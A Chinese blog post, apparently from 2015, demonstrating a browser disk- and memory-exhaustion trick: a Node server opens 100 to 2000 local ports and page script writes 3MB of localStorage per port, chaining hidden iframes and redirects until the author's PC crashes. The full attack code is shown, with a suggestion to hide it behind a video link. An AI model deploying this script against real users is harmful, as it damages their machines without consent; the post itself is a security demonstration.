<!DOCTYPE html>
<html lang="en-US">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width,initial-scale=1">
    <meta name="generator" content="VuePress 2.0.0-beta.46">
    <style>
      :root {
        --c-bg: #fff;
      }
      html.dark {
        --c-bg: #22272e;
      }
      html, body {
        background-color: var(--c-bg);
      }
    </style>
    <script>
      const userMode = localStorage.getItem('vuepress-color-scheme');
			const systemDarkMode = window.matchMedia && window.matchMedia('(prefers-color-scheme: dark)').matches;
			if (userMode === 'dark' || (userMode !== 'light' && systemDarkMode)) {
				document.documentElement.classList.toggle('dark', true);
			}
    </script>
    <title>作为一个前端，可以如何机智地弄坏一台电脑？ | </title><meta name="description" content="">
    <link rel="modulepreload" href="/assets/app.3398e39f.js"><link rel="modulepreload" href="/assets/hack-in-localstorage.html.7c0fcc97.js"><link rel="modulepreload" href="/assets/hack-in-localstorage.html.53f8aa7a.js"><link rel="prefetch" href="/assets/index.html.ba9440ef.js"><link rel="prefetch" href="/assets/a-chrismas-ico.html.89185cb2.js"><link rel="prefetch" href="/assets/about-pjax.html.97c62139.js"><link rel="prefetch" href="/assets/assassins-creed.html.7ab82df0.js"><link rel="prefetch" href="/assets/brave-new-world.html.0530c3ae.js"><link rel="prefetch" href="/assets/brief-oauth.html.9aad3e13.js"><link rel="prefetch" href="/assets/changbaishan.html.1ba85448.js"><link rel="prefetch" href="/assets/coffee.html.7f7e1239.js"><link rel="prefetch" href="/assets/css-jiugongge.html.cf5f679f.js"><link rel="prefetch" href="/assets/css-jiugongge2.html.1334b07c.js"><link rel="prefetch" href="/assets/css3-animater.html.d9c32254.js"><link rel="prefetch" href="/assets/diary-2016-0710-0716.html.66fbfe3e.js"><link rel="prefetch" href="/assets/diary-2016-0717-0723.html.c2b5ce53.js"><link rel="prefetch" href="/assets/diary-2016-0724-0730.html.77c80bda.js"><link rel="prefetch" href="/assets/diary-2016-0731-0806.html.d1d81ec6.js"><link rel="prefetch" href="/assets/diary-2016-0807-0813.html.682730b6.js"><link rel="prefetch" href="/assets/diary-2016-0814-0820.html.4755a77d.js"><link rel="prefetch" href="/assets/diary-2016-0904-0910.html.411c93a2.js"><link rel="prefetch" href="/assets/diary-2016-0911-0924.html.ebf4211d.js"><link rel="prefetch" href="/assets/diary-2016-1001-1007.html.9c53cf72.js"><link rel="prefetch" href="/assets/diary-2016-1008-1015.html.260fa7eb.js"><link rel="prefetch" href="/assets/diary-2016-1016-1022.html.b3337036.js"><link rel="prefetch" href="/assets/diary-2016-1023-1029.html.f039629c.js"><link rel="prefetch" href="/assets/diary-2016-1030-1105.html.3c6eb151.js"><link rel="prefetch" href="/assets/diary-2016-1112-1119.html.0cc306f9.js"><link rel="prefetch" href="/assets/diary-2016-1225-1231.html.ad70bfc6.js"><link rel="prefetch" href="/assets/diary-2017-0101-0107.html.fb0f4566.js"><link rel="prefetch" href="/assets/diary-2017-0118-0125.html.7b5803ad.js"><link rel="prefetch" href="/assets/diary-2017-0212-0218.html.b54ddd0d.js"><link rel="prefetch" href="/assets/diary-2017-0305-0311.html.82ee7405.js"><link rel="prefetch" href="/assets/diary-2017-0416-0422.html.d879a116.js"><link rel="prefetch" href="/assets/diary-2017-0521-0527.html.1bab3615.js"><link rel="prefetch" href="/assets/douban-index-for-chrome.html.47b2d15f.js"><link rel="prefetch" href="/assets/feng-shui.html.4f63a789.js"><link rel="prefetch" href="/assets/folder-to-tree.html.90f45fcd.js"><link rel="prefetch" href="/assets/graduation-shirt-design.html.209364cb.js"><link rel="prefetch" href="/assets/guide-for-zb.html.fa200c5f.js"><link rel="prefetch" href="/assets/gulangyu.html.f472a695.js"><link rel="prefetch" href="/assets/handling-asynchronous-js.html.8097665b.js"><link rel="prefetch" href="/assets/hello-world.html.6d37f274.js"><link rel="prefetch" href="/assets/hexo-theme-yilia.html.da09280e.js"><link rel="prefetch" href="/assets/history-of-browser-useragent.html.37bdb233.js"><link rel="prefetch" href="/assets/history-of-browser-useragent2.html.50c33d75.js"><link rel="prefetch" href="/assets/img-lazy-load.html.5407e6c7.js"><link rel="prefetch" href="/assets/instagram-api-ex.html.82b1c716.js"><link rel="prefetch" href="/assets/journey-to-yunnan.html.850719f5.js"><link rel="prefetch" href="/assets/kael-qrcode-info.html.e19cbb92.js"><link rel="prefetch" href="/assets/lock-me-in-a-cup.html.9996d006.js"><link rel="prefetch" href="/assets/logic-of-chord.html.4238aa72.js"><link rel="prefetch" href="/assets/mediator-model.html.f0aea667.js"><link rel="prefetch" href="/assets/my-fairy-tale1.html.9e24960d.js"><link rel="prefetch" href="/assets/my-fairy-tale2.html.884cb556.js"><link rel="prefetch" href="/assets/my-fairy-tale3.html.588af47c.js"><link rel="prefetch" href="/assets/my-fairy-tale4.html.cf518aae.js"><link rel="prefetch" href="/assets/my-news-reader-box.html.5bebe985.js"><link rel="prefetch" href="/assets/my2013.html.319ac566.js"><link rel="prefetch" href="/assets/nginx-in-fe.html.d5c0bd5a.js"><link rel="prefetch" href="/assets/no-one-used-pro.html.4e1f7f1a.js"><link rel="prefetch" href="/assets/oauth-rabbit.html.ac4a8aaf.js"><link rel="prefetch" href="/assets/prevent-spiders.html.f8fb6d1b.js"><link rel="prefetch" href="/assets/reduce-http-requests.html.72fb8432.js"><link rel="prefetch" href="/assets/safety-point-of-view-from-front-end.html.d7583e7f.js"><link rel="prefetch" href="/assets/share-a-css-hack.html.6c9bca98.js"><link rel="prefetch" href="/assets/something-about-immersion.html.0b4a2c82.js"><link rel="prefetch" href="/assets/the-storied-life-of-aj.html.bad8cca0.js"><link rel="prefetch" href="/assets/theme-update1-dot-0.html.f10e351b.js"><link rel="prefetch" href="/assets/thinner-than-1px-border.html.07773ff6.js"><link rel="prefetch" href="/assets/three-drama.html.53efe0a3.js"><link rel="prefetch" href="/assets/two-magics-of-the-pilot.html.3281561d.js"><link rel="prefetch" href="/assets/viewing-commentary.html.ce8360d5.js"><link rel="prefetch" href="/assets/volunteer-activities.html.e524147d.js"><link rel="prefetch" href="/assets/web-worker-learning.html.3e807a0e.js"><link rel="prefetch" href="/assets/yilia-on-mobile.html.21a4600f.js"><link rel="prefetch" href="/assets/404.html.f166316b.js"><link rel="prefetch" href="/assets/index.html.8b42ef7f.js"><link rel="prefetch" href="/assets/a-chrismas-ico.html.26b2f527.js"><link rel="prefetch" href="/assets/about-pjax.html.3c650957.js"><link rel="prefetch" href="/assets/assassins-creed.html.89f88cae.js"><link rel="prefetch" href="/assets/brave-new-world.html.2a6b5aa6.js"><link rel="prefetch" href="/assets/brief-oauth.html.d8f0e7e5.js"><link rel="prefetch" href="/assets/changbaishan.html.189218d0.js"><link rel="prefetch" href="/assets/coffee.html.4c8be66f.js"><link rel="prefetch" href="/assets/css-jiugongge.html.9b5a508c.js"><link rel="prefetch" href="/assets/css-jiugongge2.html.ab6051fe.js"><link rel="prefetch" href="/assets/css3-animater.html.139eb34d.js"><link rel="prefetch" href="/assets/diary-2016-0710-0716.html.7a2b0c25.js"><link rel="prefetch" href="/assets/diary-2016-0717-0723.html.1bd3af7d.js"><link rel="prefetch" href="/assets/diary-2016-0724-0730.html.30f9c39d.js"><link rel="prefetch" href="/assets/diary-2016-0731-0806.html.bc938d2e.js"><link rel="prefetch" href="/assets/diary-2016-0807-0813.html.a6786712.js"><link rel="prefetch" href="/assets/diary-2016-0814-0820.html.761bfbba.js"><link rel="prefetch" href="/assets/diary-2016-0904-0910.html.26af90e9.js"><link rel="prefetch" href="/assets/diary-2016-0911-0924.html.f3b38d89.js"><link rel="prefetch" href="/assets/diary-2016-1001-1007.html.acd74014.js"><link rel="prefetch" href="/assets/diary-2016-1008-1015.html.0c926c23.js"><link rel="prefetch" href="/assets/diary-2016-1016-1022.html.7408c19a.js"><link rel="prefetch" href="/assets/diary-2016-1023-1029.html.cd336d75.js"><link rel="prefetch" href="/assets/diary-2016-1030-1105.html.51febe57.js"><link rel="prefetch" href="/assets/diary-2016-1112-1119.html.f04c4f98.js"><link rel="prefetch" href="/assets/diary-2016-1225-1231.html.c8d88d11.js"><link rel="prefetch" href="/assets/diary-2017-0101-0107.html.616426b7.js"><link rel="prefetch" href="/assets/diary-2017-0118-0125.html.bfed96da.js"><link rel="prefetch" href="/assets/diary-2017-0212-0218.html.ef3cd352.js"><link rel="prefetch" href="/assets/diary-2017-0305-0311.html.43aad639.js"><link rel="prefetch" href="/assets/diary-2017-0416-0422.html.3af0458a.js"><link rel="prefetch" href="/assets/diary-2017-0521-0527.html.8fbdeea3.js"><link rel="prefetch" href="/assets/douban-index-for-chrome.html.b4cb7f42.js"><link rel="prefetch" href="/assets/feng-shui.html.0c6ed08e.js"><link rel="prefetch" href="/assets/folder-to-tree.html.61acaaff.js"><link rel="prefetch" href="/assets/graduation-shirt-design.html.1c444eaf.js"><link rel="prefetch" href="/assets/guide-for-zb.html.b6d7c6cc.js"><link rel="prefetch" href="/assets/gulangyu.html.021b58a0.js"><link rel="prefetch" href="/assets/handling-asynchronous-js.html.0f88537e.js"><link rel="prefetch" href="/assets/hello-world.html.a3964cc6.js"><link rel="prefetch" href="/assets/hexo-theme-yilia.html.fb004412.js"><link rel="prefetch" href="/assets/history-of-browser-useragent.html.2c5ae29e.js"><link rel="prefetch" href="/assets/history-of-browser-useragent2.html.5629ae5c.js"><link rel="prefetch" href="/assets/img-lazy-load.html.b4bf44ea.js"><link rel="prefetch" href="/assets/instagram-api-ex.html.3b3cfeaa.js"><link rel="prefetch" href="/assets/journey-to-yunnan.html.c1bc777f.js"><link rel="prefetch" href="/assets/kael-qrcode-info.html.acad9415.js"><link rel="prefetch" href="/assets/lock-me-in-a-cup.html.e724e02d.js"><link rel="prefetch" href="/assets/logic-of-chord.html.6304261e.js"><link rel="prefetch" href="/assets/mediator-model.html.f67e4ebd.js"><link rel="prefetch" href="/assets/my-fairy-tale1.html.c3e8673d.js"><link rel="prefetch" href="/assets/my-fairy-tale2.html.609b1245.js"><link rel="prefetch" href="/assets/my-fairy-tale3.html.3414eae5.js"><link rel="prefetch" href="/assets/my-fairy-tale4.html.c4962e69.js"><link rel="prefetch" href="/assets/my-news-reader-box.html.1620550d.js"><link rel="prefetch" href="/assets/my2013.html.895b86d4.js"><link rel="prefetch" href="/assets/nginx-in-fe.html.bda2ebcf.js"><link rel="prefetch" href="/assets/no-one-used-pro.html.b4a21850.js"><link rel="prefetch" href="/assets/oauth-rabbit.html.a5b25dc7.js"><link rel="prefetch" href="/assets/prevent-spiders.html.334dc9fe.js"><link rel="prefetch" href="/assets/reduce-http-requests.html.183fde1a.js"><link rel="prefetch" href="/assets/safety-point-of-view-from-front-end.html.97747568.js"><link rel="prefetch" href="/assets/share-a-css-hack.html.bdfcd302.js"><link rel="prefetch" href="/assets/something-about-immersion.html.0f0fe315.js"><link rel="prefetch" href="/assets/the-storied-life-of-aj.html.e28618c6.js"><link rel="prefetch" href="/assets/theme-update1-dot-0.html.804d00b5.js"><link rel="prefetch" href="/assets/thinner-than-1px-border.html.36f5929c.js"><link rel="prefetch" href="/assets/three-drama.html.bf984fe3.js"><link rel="prefetch" href="/assets/two-magics-of-the-pilot.html.db685b26.js"><link rel="prefetch" href="/assets/viewing-commentary.html.dd44c6b0.js"><link rel="prefetch" href="/assets/volunteer-activities.html.dc68803a.js"><link rel="prefetch" href="/assets/web-worker-learning.html.ff47e92f.js"><link rel="prefetch" href="/assets/yilia-on-mobile.html.6f992b54.js"><link rel="prefetch" href="/assets/404.html.b1bfbdaf.js"><link rel="prefetch" href="/assets/404.5e85c5b4.js"><link rel="prefetch" href="/assets/Layout.924ef564.js">
    <link rel="stylesheet" href="/assets/style.3ac1bbff.css">
  </head>
  <body>
    <div id="app"><!--[--><div class="theme-container"><!--[--><header class="navbar"><div class="toggle-sidebar-button" title="toggle sidebar" aria-expanded="false" role="button" tabindex="0"><div class="icon" aria-hidden="true"><span></span><span></span><span></span></div></div><span><a href="/" class=""><!----><!----></a></span><div class="navbar-items-wrapper" style=""><!--[--><!--]--><!----><!--[--><!--]--><button class="toggle-dark-button" title="toggle dark mode"><svg style="" class="icon" focusable="false" viewBox="0 0 32 32"><path d="M16 12.005a4 4 0 1 1-4 4a4.005 4.005 0 0 1 4-4m0-2a6 6 0 1 0 6 6a6 6 0 0 0-6-6z" fill="currentColor"></path><path d="M5.394 6.813l1.414-1.415l3.506 3.506L8.9 10.318z" fill="currentColor"></path><path d="M2 15.005h5v2H2z" fill="currentColor"></path><path d="M5.394 25.197L8.9 21.691l1.414 1.415l-3.506 3.505z" fill="currentColor"></path><path d="M15 25.005h2v5h-2z" fill="currentColor"></path><path d="M21.687 23.106l1.414-1.415l3.506 3.506l-1.414 1.414z" fill="currentColor"></path><path d="M25 15.005h5v2h-5z" fill="currentColor"></path><path d="M21.687 8.904l3.506-3.506l1.414 1.415l-3.506 3.505z" fill="currentColor"></path><path d="M15 2.005h2v5h-2z" fill="currentColor"></path></svg><svg style="display:none;" class="icon" focusable="false" viewBox="0 0 32 32"><path d="M13.502 5.414a15.075 15.075 0 0 0 11.594 18.194a11.113 11.113 0 0 1-7.975 3.39c-.138 0-.278.005-.418 0a11.094 11.094 0 0 1-3.2-21.584M14.98 3a1.002 1.002 0 0 0-.175.016a13.096 13.096 0 0 0 1.825 25.981c.164.006.328 0 .49 0a13.072 13.072 0 0 0 10.703-5.555a1.01 1.01 0 0 0-.783-1.565A13.08 13.08 0 0 1 15.89 4.38A1.015 1.015 0 0 0 14.98 3z" fill="currentColor"></path></svg></button><!----></div></header><!--]--><div class="sidebar-mask"></div><!--[--><aside class="sidebar"><!----><!--[--><!--]--><ul class="sidebar-items"><!--[--><li><p tabindex="0" class="sidebar-item sidebar-heading">作为一个前端，可以如何机智地弄坏一台电脑？ <!----></p><ul style="" class="sidebar-item-children"><!--[--><li><a aria-current="page" href="/posts/hack-in-localstorage.html#reward-true" class="router-link-active router-link-exact-active sidebar-item" aria-label="reward: true"><!--[--><!--]--> reward: true <!--[--><!--]--></a><ul style="" class="sidebar-item-children"><!--[--><li><a aria-current="page" href="/posts/hack-in-localstorage.html#起因" class="router-link-active router-link-exact-active sidebar-item" aria-label="起因"><!--[--><!--]--> 起因 <!--[--><!--]--></a><!----></li><li><a aria-current="page" href="/posts/hack-in-localstorage.html#关键" class="router-link-active router-link-exact-active sidebar-item" aria-label="关键"><!--[--><!--]--> 关键 <!--[--><!--]--></a><!----></li><li><a aria-current="page" href="/posts/hack-in-localstorage.html#自动遍历" class="router-link-active router-link-exact-active sidebar-item" aria-label="自动遍历"><!--[--><!--]--> 自动遍历 <!--[--><!--]--></a><!----></li><li><a aria-current="page" href="/posts/hack-in-localstorage.html#继续实验的黑科技" class="router-link-active router-link-exact-active sidebar-item" aria-label="继续实验的黑科技"><!--[--><!--]--> 继续实验的黑科技 <!--[--><!--]--></a><!----></li><li><a aria-current="page" href="/posts/hack-in-localstorage.html#最后" class="router-link-active router-link-exact-active sidebar-item" aria-label="最后"><!--[--><!--]--> 最后 <!--[--><!--]--></a><!----></li><!--]--></ul></li><!--]--></ul></li><!--]--></ul><!--[--><!--]--></aside><!--]--><!--[--><main class="page"><!--[--><!--]--><div class="theme-default-content"><!--[--><!--]--><div><p>date: 2015-07-06 22:30</p><h2 id="reward-true" tabindex="-1"><a class="header-anchor" href="#reward-true" aria-hidden="true">#</a> reward: true</h2><p>有人说，前端的界限就在浏览器那儿。</p><p>无论你触发了多少 bug，最多导致浏览器崩溃，对系统影响不到哪去。 这就像二次元各种炫酷的毁灭世界，都不会导致三次元的世界末日。 然而，作为一个前端，我发现是有方式打开次元大门的…</p><p>这个实验脑洞较大，动机无聊，但某种意义上反映了一些<strong>安全问题</strong>。 想象一下，有天你在家里上网，吃着火锅还唱着歌，<strong>点开一个链接，电脑突然就蓝屏了</strong>！想想还真有点小激动。</p><h3 id="起因" tabindex="-1"><a class="header-anchor" href="#起因" aria-hidden="true">#</a> 起因</h3><p>故事得从 localStorage 说起。</p><p>html5 的本地存储，相信大家都不陌生。将数据以二进制文件形式存储到本地，在当前应用得非常广泛。 windows 下的 chrome，localStorage 存储于<code>C:\Users\xxx\AppData\Local\Google\Chrome\User Data\Default\Local Storage</code>文件夹中。但如果任由网页无限写文件，对用户硬盘的伤害可想而知，因而浏览器对其做了大小限制。</p><p>对于一个域名+端口，PC 侧的上限是 5M-10M 之间，移动侧是则不大于 2.5M。</p><p>那么问题就变成：<strong>这样的限制足够保护用户硬盘了吗</strong>？</p><h3 id="关键" tabindex="-1"><a class="header-anchor" href="#关键" aria-hidden="true">#</a> 关键</h3><p>关键的问题在于，这一限制，针对的是一个<code>域名+端口</code>。 也就是说，你访问<code>同一个域名的不同端口</code>，它们的 localStorage 并无关联，是分开存储的。</p><p>我用 node 简单地开启了服务器，这时，用户访问<code>http://127.0.0.1:1000</code>到<code>http://127.0.0.1:1099</code>这 100 个端口，会请求到同一个页面：<code>index.html</code>：</p><div class="language-text ext-text line-numbers-mode"><pre class="language-text"><code>var http = require(&#39;http&#39;);
var fs = require(&#39;fs&#39;);

//100个端口
for(var port = 1000; port&lt; 1100; port++){
  http.createServer(function (request, response) {
    //请忽略这种循环读文件的方式，只为了简便
    fs.readFile(&#39;./index.html&#39;, function(err, content){
      if(err) {
      } else {
        response.writeHead(200, { &#39;Content-Type&#39; : &#39;text/html; charset=UTF-8&#39; });
        response.write(content);
        response.end();
      }
    });
  }).listen(port, &#39;127.0.0.1&#39;);
}
</code></pre><div class="line-numbers" aria-hidden="true"><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div></div></div><p>当然，这个 index.html 里涉及了 localStorage 写操作。</p><div class="language-text ext-text line-numbers-mode"><pre class="language-text"><code>var s = &quot;&quot;;
//慢慢来，别写太大了，好害怕…
for(var i=0; i&lt; 3 * 1024 * 1024; i++){
  s += &quot;0&quot;;
}
localStorage.setItem(&quot;testData&quot;, s);
</code></pre><div class="line-numbers" aria-hidden="true"><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div></div></div><p>我试着用浏览器分别访问了几个端口，结果是分开存储。一切跟剧本一样。</p><h3 id="自动遍历" tabindex="-1"><a class="header-anchor" href="#自动遍历" aria-hidden="true">#</a> 自动遍历</h3><p>但这种程度还不够。 如果要实验变得更好（xie）玩（e）一些，问题就变成如何<code>让用户自动遍历这些端口</code>？</p><p>iframe 是个好的尝试。 只要一打开<code>http://127.0.0.1: 1000</code>，页面的脚步就会创建一个 iframe，去请求<code>http://127.0.0.1: 1001</code>，一直循环下去。</p><div class="language-text ext-text line-numbers-mode"><pre class="language-text"><code>var Main = (function(){
  var _key = &quot;testData&quot;;
  var _max = 1100; //最大限制
  return {
    init: function(){
      //慢慢来，别写太大了，好害怕…
      var s = &quot;&quot;;
      for(var i=0; i&lt; 3 * 1024 * 1024; i++){
        s += &quot;0&quot;;
      }
      localStorage.setItem(_key, s);

      var port = parseInt(location.port)+1;
      if(port &gt; _max) return;

      //新添加iframe
      var url = &quot;http://127.0.0.1:&quot; + port;
      var $iframe = document.createElement(&quot;iframe&quot;);
      $iframe.src = url;
      document.getElementsByTagName(&quot;body&quot;)[0].appendChild($iframe);
    }
  }
})();
</code></pre><div class="line-numbers" aria-hidden="true"><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div></div></div><p>当然 iframe 我们还可以设置为不可见，以掩盖这种不厚道的行为… 比方说，有人发给你一个链接，你打开后发现是个视频，而你根本注意不到背后的脚本，在视频播放的几分钟里，快要把你的 C 盘写满。</p><p>然后我就看到请求如潮水渐涨： <img src="/assets/blogImg/localstorage1.png" alt=""></p><p>但是，请求到 1081 端口，最新的 chrome 就崩溃掉了…原来 iframe 嵌套太多，已经到达了浏览器的极限。</p><p>###防止浏览器崩溃</p><p>C 盘还未撑满，同志还需努力。怎么办？</p><p>突然想到，到达 iframe 极限之前，我们可以重定向啊。 每访问 50 个端口，就使用<code>window.location.href</code>重定向一次，去确保浏览器不崩溃。</p><div class="language-text ext-text line-numbers-mode"><pre class="language-text"><code>var Main = (function(){
  var _key = &quot;testData&quot;;
  var _max = 1200; //最大限制
  var _jumpSpace = 50; //为避免iframe过多导致浏览器crash，每50个执行跳转

  return {
    init: function(){
      //慢慢来，别写太大了，好害怕…
      var s = &quot;&quot;;
      for(var i=0; i&lt; 3 * 1024 * 1024; i++){
        s += &quot;0&quot;;
      }
      localStorage.setItem(_key, s);

      var port = parseInt(location.port)+1;
      if(port &gt; _max) return;

      if(port % _jumpSpace == 0){
        //每50个，重定向一次
        window.location.href = url;
      }else{
        //新添加iframe
        var $iframe = document.createElement(&quot;iframe&quot;);
        $iframe.src = url;
        document.getElementsByTagName(&quot;body&quot;)[0].appendChild($iframe);
      }
    }
  }
})();
</code></pre><div class="line-numbers" aria-hidden="true"><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div></div></div><p>事实证明，这种蛮拼的方法的确可行。</p><p>至此，只要访问<code>http://127.0.0.1: 1000</code>，就会往 Local Storage 文件夹里写入近 500M 无用数据： <img src="/assets/blogImg/localstorage3.png" alt=""></p><p>里面的数据是这样的： <img src="/assets/blogImg/localstorage2.png" alt=""></p><h3 id="继续实验的黑科技" tabindex="-1"><a class="header-anchor" href="#继续实验的黑科技" aria-hidden="true">#</a> 继续实验的黑科技</h3><p>算了下我的 C 盘还有空间嘛，那就把端口数量从 100 增长到 200 个。 结果是这样的，到达了 1.17G 大小。 <img src="/assets/blogImg/localstorage4.png" alt=""></p><p>在后续的实验中，我就慢慢的把端口数量与存储的数据调大。</p><p>电脑也运行得越来越慢。这是为什么呢？</p><p>我观察到，有时候执行<code>localStorage.setItem()</code>后，在文件夹里不一定立即能看到数据文件。 怀疑这些数据会被 chrome 先放到内存里，以避免重复读写带来的消耗，在空闲或关闭的时机，再写进硬盘里。</p><p>但此时，浏览器已经影响到系统了。它处于一种“不会崩溃”，但“因为占用了许多内存，已经妨碍用户电脑的正常使用”的状态。 即使用户关闭了浏览器窗口，也不会很快恢复。要知道读写任务并不是随窗口关闭而终止的，否则浏览器会丢失数据。</p><p>遭遇黑科技的人们能做的只有：</p><ol><li>等待；</li><li>用任务管理器关掉 chrome 进程，再等待；</li><li>相信并尝试“重启电脑解决 90%电脑问题”的科学论断</li></ol><p>可以说，浏览器的内心几乎是崩溃的。</p><h3 id="最后" tabindex="-1"><a class="header-anchor" href="#最后" aria-hidden="true">#</a> 最后</h3><p>最后，还是得用严肃脸告诫一下：害人之心不可无。 本实验，从一开始就是怀揣着将<code>安全问题上交给国家的初衷</code>去做的（是的就是这么纯粹）。</p><p>后续，看着 C 盘还有 2G 空间，我又把端口增长到 2000 个，试下会发生什么。 由于请求过多，需要一定时间，我就去做别的事情了。 回来后发现房间安静祥和，美轮美奂，一片蓝光，像是加了特技。</p><p><img src="/assets/blogImg/localstorage5.png" alt=""></p><p>那么问题来了，计算机修理哪家强？ 有点急…</p></div><!--[--><!--]--></div><footer class="page-meta"><!----><div class="meta-item last-updated"><span class="meta-item-label">Last Updated: </span><!----></div><div class="meta-item contributors"><span class="meta-item-label">Contributors: </span><span class="meta-item-info"><!--[--><!--[--><span class="contributor" title="email: zhang13pro@qq.com">LEX</span><!----><!--]--><!--]--></span></div></footer><!----><!--[--><!--]--></main><!--]--></div><!----><!--]--></div>
    <script type="module" src="/assets/app.3398e39f.js" defer></script>
  </body>
</html>
